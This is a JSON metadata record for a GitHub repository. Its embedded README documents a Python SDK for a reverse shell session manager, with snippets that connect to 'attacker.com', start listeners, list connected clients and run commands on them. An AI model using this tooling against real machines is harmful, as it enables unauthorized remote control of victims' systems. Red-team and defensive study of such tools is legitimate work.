{"id":25203718,"url":"https://github.com/threatcode/goporting-python","last_synced_at":"2025-07-14T02:35:31.910Z","repository":{"id":197959413,"uuid":"699746118","full_name":"threatcode/Goporting-Python","owner":"threatcode","description":null,"archived":false,"fork":false,"pushed_at":"2025-05-02T23:14:35.000Z","size":28,"stargazers_count":0,"open_issues_count":22,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-05-03T00:23:22.781Z","etag":null,"topics":["python-reverse-shell","reverse-engineering","web-shell"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/threatcode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-03T08:57:19.000Z","updated_at":"2023-10-03T09:37:45.000Z","dependencies_parsed_at":null,"dependency_job_id":"51eb2f81-8c4b-4b45-8fce-d733175e9f46","html_url":"https://github.com/threatcode/Goporting-Python","commit_stats":null,"previous_names":["threatcode/goporting-python"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/threatcode/Goporting-Python","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threatcode%2FGoporting-Python","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threatcode%2FGoporting-Python/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threatcode%2FGoporting-Python/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threatcode%2FGoporting-Python/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/threatcode","download_url":"https://codeload.github.com/threatcode/Goporting-Python/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threatcode%2FGoporting-Python/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":265233753,"owners_count":23731825,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["python-reverse-shell","reverse-engineering","web-shell"],"created_at":"2025-02-10T07:18:27.279Z","updated_at":"2025-07-14T02:35:31.884Z","avatar_url":"https://github.com/threatcode.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Goporting-Python\n\nPython SDK for reverse shell sessions manager [Goporting v1.3.1](https://github.com/ThraetCode/Goporting)\n\n## Install\n\n```bash\npip install goporting-python\n```\n\n## Usage\n\n### Connect to Goporting endpoint\n```python\nimport goporting_python as pp\n\np = pp.Goporting(\"attacker.com\", 7331)\n```\n\n### Create a reverse shell server\n\n```python\nserver = p.create_server(\"0.0.0.0\", 13339)\n```\n\n### Stop a reverse shell server\n\n```python\nserver = servers[0]\nserver.delete()\n```\n\n### Get all available listening servers\n\n```python\nservers = p.get_servers()\nfor server in servers():\n    print(server)\n```\n\n\n### Get all online Clients of a server\n\n```python\nserver = servers[0]\nclients = server.get_clients()\nfor client in clients:\n    print(client)\n```\n\n### Execute a command on a client\n\n```python\nclient = clients[0]\nclient.system(\"id\")\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthreatcode%2Fgoporting-python","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthreatcode%2Fgoporting-python","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthreatcode%2Fgoporting-python/lists"}